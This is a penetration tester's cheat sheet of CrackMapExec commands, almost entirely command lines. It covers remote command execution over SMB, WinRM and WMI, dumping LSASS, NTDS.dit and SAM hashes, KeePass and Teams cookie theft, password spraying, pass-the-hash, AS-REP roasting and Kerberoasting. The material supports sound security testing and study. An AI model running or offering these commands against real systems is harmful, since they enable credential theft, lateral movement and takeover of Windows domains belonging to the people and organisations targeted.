Crackmapexec notes
A lot of this was pulled from the waybackmachine archive of what used to be crackmapexec.wiki, but it seems the original site is down now. This should be a comprehensive list of general commands that can be used with Crackmapexec.
Basic command execution stuff
What protocol is this?
crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami
crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable'
SMB stuff
dump creds
Note that for a lot of these, you need local admin just like with MimiKatz.
LSASS
cme smb 192.168.255.131 -u administrator -p pass -M lsassy
cme smb 192.168.255.131 -u administrator -p pass -M nanodump
Wireless
cme smb <ip> -u user -p pass -M wireless
KeePass
$ crackmapexec smb <ip> -u user -p pass -M keepass_discover
$ crackmapexec smb <ip> -u user -p pass -M keepass_trigger -o KEEPASS_CONFIG_PATH="path_from_module_discovery"
NTDS.dit
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users --enabled
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
Note: you can also get NTDS.dit by DCSYNC'ing with the DC machine acct.
SAM hashes
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam
MS Teams cookie theft (need local admin)
$ crackmapexec smb <ip> -u user -p pass -M teams_localdb
SMB password sprays
#~ cme smb 192.168.1.101 -u user1 user2 user3 -p Summer18
#~ cme smb 192.168.1.101 -u user1 -p password1 password2 password3
#~ cme smb 192.168.1.101 -u /path/to/users.txt -p Summer18
#~ cme smb 192.168.1.101 -u Administrator -p /path/to/passwords.txt
Local authentication examples
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth
#~ cme smb 192.168.1.0/24 -u '' -p '' --local-auth
#~ cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT' --local-auth
#~ cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH' --local-auth
#~ cme smb 192.168.1.0/24 -u localguy -H '13b29964cc2480b4ef454c59562e675c' --local-auth
#~ cme smb 192.168.1.0/24 -u localguy -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c' --local-auth
LDAP
test acct existence using LDAP no kerb
#~ cme ldap 192.168.1.0/24 -u users.txt -p '' -k
testing creds
#~ cme ldap 192.168.1.0/24 -u user -p password
with hash
#~ cme ldap 192.168.1.0/24 -u user -H A29F7623FD11550DEF0192DE9246F46B
ASREP Roast
cme ldap 192.168.0.104 -u harry -p '' --asreproast output.txt
cme ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txt
cme ldap 192.168.0.104 -u harry -p pass --asreproast output.txt
Domain SID Discovery
$ crackmapexec ldap DC1.scrm.local -u sqlsvc -p Pegasus60 -k --get-sid
Kerberoast
cme ldap 192.168.0.104 -u harry -p pass --kerberoasting output.txt
Bloodhound ingestion
crackmapexec ldap <ip> -u user -p pass --bloodhound --ns ip --collection All
WINRM stuff
passwd spray
#~ cme winrm 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce
test creds
#~ cme winrm 192.168.1.0/24 -u user -p password
if SMB is closed
#~ cme winrm 192.168.1.0/24 -u user -p password -d DOMAIN
Command execution
#~ cme winrm 192.168.255.131 -u user -p 'password' -X whoami
WMI
Password Spray
#~ cme wmi 192.168.1.0/24 -u userfile -p passwordfile
#~ cme wmi 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce
test creds
#~ cme wmi 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!'
Test creds if no SMB
#~ cme wmi 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!' -d <domain>
Local auth
#~ cme wmi 10.10.10.52 -u admin -p 'admin' --local-auth
WMI command execution
#~ crackmapexec wmi 192.168.255.131 -u user -p 'password' -x whoami